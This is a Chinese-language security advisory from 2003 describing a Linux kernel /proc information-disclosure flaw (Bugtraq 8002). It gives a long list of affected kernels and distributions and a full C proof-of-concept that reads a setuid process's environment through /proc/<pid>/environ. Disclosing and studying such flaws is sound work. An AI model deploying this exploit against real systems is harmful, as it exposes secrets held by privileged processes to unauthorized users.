Linux /proc伪文件系统信息泄露漏洞

发布时间：2003-06-20
更新时间：2003-06-20
严重程度：低
威胁程度：服务器信息泄露
错误类型：设计错误
利用方式：服务器模式

BUGTRAQ ID：8002

受影响系统

Linux kernel 2.2
Linux kernel 2.2.1
Linux kernel 2.2.2
Linux kernel 2.2.3
Linux kernel 2.2.4
Linux kernel 2.2.5
Linux kernel 2.2.6
Linux kernel 2.2.7
Linux kernel 2.2.8
Linux kernel 2.2.9
Linux kernel 2.2.10
   +Caldera OpenLinux 2.3
Linux kernel 2.2.11
Linux kernel 2.2.12
Linux kernel 2.2.13
   +S.u.S.E. Linux 6.3
   +S.u.S.E. Linux 6.4
Linux kernel 2.2.14
   +RedHat Linux 6.2
   +SCO eDesktop 2.4
   +SCO eServer 2.3.1
   +Sun Cobalt RaQ 4
Linux kernel 2.2.15
   +MandrakeSoft Corporate Server 1.0.1
   +MandrakeSoft Linux Mandrake 7.1
Linux kernel 2.2.16
   +RedHat Linux 7.0
   +Sun Cobalt Qube 3
   +Sun Cobalt RaQ XTR
   +Trustix Secure Linux 1.1
Linux kernel 2.2.17
   +MandrakeSoft Linux Mandrake 7.2
   +S.u.S.E. Linux 7.0
   +Trustix Secure Linux 1.2
Linux kernel 2.2.18
   +Wirex Immunix OS 6.2
   +Wirex Immunix OS 7.0
   +Wirex Immunix OS 7.0 -Beta
Linux kernel 2.2.19
   +EnGarde Secure Linux 1.0.1
   +MandrakeSoft Linux Mandrake 8.0
   +MandrakeSoft Linux Mandrake 8.0 ppc
   +MandrakeSoft Linux Mandrake 8.1
   +MandrakeSoft Single Network Firewall 7.2
   +S.u.S.E. Linux 6.3
   +S.u.S.E. Linux 6.4
   +S.u.S.E. Linux 7.0
   +Trustix Secure Linux 1.5
Linux kernel 2.2.20
   +MandrakeSoft Linux Mandrake 8.2
   +MandrakeSoft Linux Mandrake 8.2 ppc
Linux kernel 2.2.21
Linux kernel 2.2.22
   +Trustix Secure Linux 1.1
   +Trustix Secure Linux 1.2
   +Trustix Secure Linux 1.5
Linux kernel 2.2.23
Linux kernel 2.2.24
Linux kernel 2.2.25
Linux kernel 2.4.1
Linux kernel 2.4.2
   +Caldera OpenLinux Server 3.1
   +Caldera OpenLinux Workstation 3.1
   +RedHat Linux 7.1 alpha
   +RedHat Linux 7.1 i386
Linux kernel 2.4.3
   +MandrakeSoft Linux Mandrake 8.0
   +MandrakeSoft Linux Mandrake 8.0 ppc
Linux kernel 2.4.4
   +S.u.S.E. Linux 7.2
Linux kernel 2.4.5
   +Slackware Linux 8.0
Linux kernel 2.4.6
Linux kernel 2.4.7
   +RedHat Linux 7.2
   +S.u.S.E. Linux 7.1
   +S.u.S.E. Linux 7.2
Linux kernel 2.4.8
   +MandrakeSoft Linux Mandrake 8.0
   +MandrakeSoft Linux Mandrake 8.1
   +MandrakeSoft Linux Mandrake 8.2
Linux kernel 2.4.9
   +RedHat Enterprise Linux AS 2.1
   +RedHat Enterprise Linux ES 2.1
   +RedHat Enterprise Linux WS 2.1
   +RedHat Linux 7.1 alpha
   +RedHat Linux 7.1 i386
   +RedHat Linux 7.1 ia64
   +RedHat Linux 7.2 alpha
   +RedHat Linux 7.2 i386
   +RedHat Linux 7.2 ia64
   +Sun Linux 5.0
   +Sun Linux 5.0.3
Linux kernel 2.4.10
   +S.u.S.E. Linux 7.3
Linux kernel 2.4.11
Linux kernel 2.4.12
   +Conectiva Linux 7.0
Linux kernel 2.4.13
   +Caldera OpenLinux Server 3.1.1
   +Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.14
Linux kernel 2.4.15
Linux kernel 2.4.16
   +Sun Cobalt RaQ 550
Linux kernel 2.4.17
Linux kernel 2.4.18
   +Astaro Security Linux 2.0 16
   +Astaro Security Linux 2.0 23
   +MandrakeSoft Linux Mandrake 8.0
   +MandrakeSoft Linux Mandrake 8.1
   +MandrakeSoft Linux Mandrake 8.2
   +RedHat Linux 7.3
   +RedHat Linux 8.0
   +S.u.S.E. Linux 7.1
   +S.u.S.E. Linux 7.2
   +S.u.S.E. Linux 7.3
   +S.u.S.E. Linux 8.0
Linux kernel 2.4.19
   +Conectiva Linux 8.0
   +Conectiva Linux Enterprise Edition 1.0
   +MandrakeSoft Linux Mandrake 9.0
   +S.u.S.E. Linux 8.1
Linux kernel 2.4.20
   +CRUX CRUX Linux 1.0
   +RedHat Linux 9.0 i386
   +Slackware Linux 9.0
Linux kernel 2.4.21

详细描述
Linux的/proc伪文件系统实现上存在问题，当一个setuid程序被执行时，一个非授权用户可能查看到suid进程的一些环境变量从而导致敏感信息的泄露。

测试代码
/****************************************************************
*                                                               *
*       Linux /proc information disclosure PoC                  *
*       by IhaQueR                                              *
*                                                               *
****************************************************************/

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>

static char buf[128];

void fatal(const char *msg)
{
    printf("\n");
    if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
    } else {
        perror(msg);
    }

    printf("\n");
    fflush(stdout);
    fflush(stderr);
    exit(129);
}

int main()
{
    int fd, r;
    char c;

    sprintf(buf, "/proc/%d/environ", getpid());
    fd = open(buf, O_RDONLY);
    if (fd > 0) {
        sprintf(buf, "/proc/%d", getpid());
        if (fork()) {
            printf("\nparent executing setuid\n");
            fflush(stdout);
            execl("/bin/ping", "ping", "-c", "3", "127.0.0.1", NULL);
            fatal("execl");
        } else {
            sleep(1);
            printf("\nchild reads parent's proc:\n");
            fflush(stdout);
            while (1) {
                r = read(fd, &c, 1);
                if (r <= 0)
                    break;
                printf("%c", c);
            }
            printf("\n\nContent of %s\n", buf);
            fflush(stdout);
            execl("/bin/ls", "ls", "-l", buf, NULL);
        }
    } else
        fatal("open proc");

    printf("\n");
    fflush(stdout);

    return 0;
}

解决方案
厂商还未提供解决方案。

相关信息
Paul Starzetz <paul@starzetz.de>

Linux /proc sensitive information disclosure
http://archives.neohapsis.com/archives/bugtraq/2003-06/0158.html

最近严重漏洞

Linux /proc伪文件系统信息泄露漏洞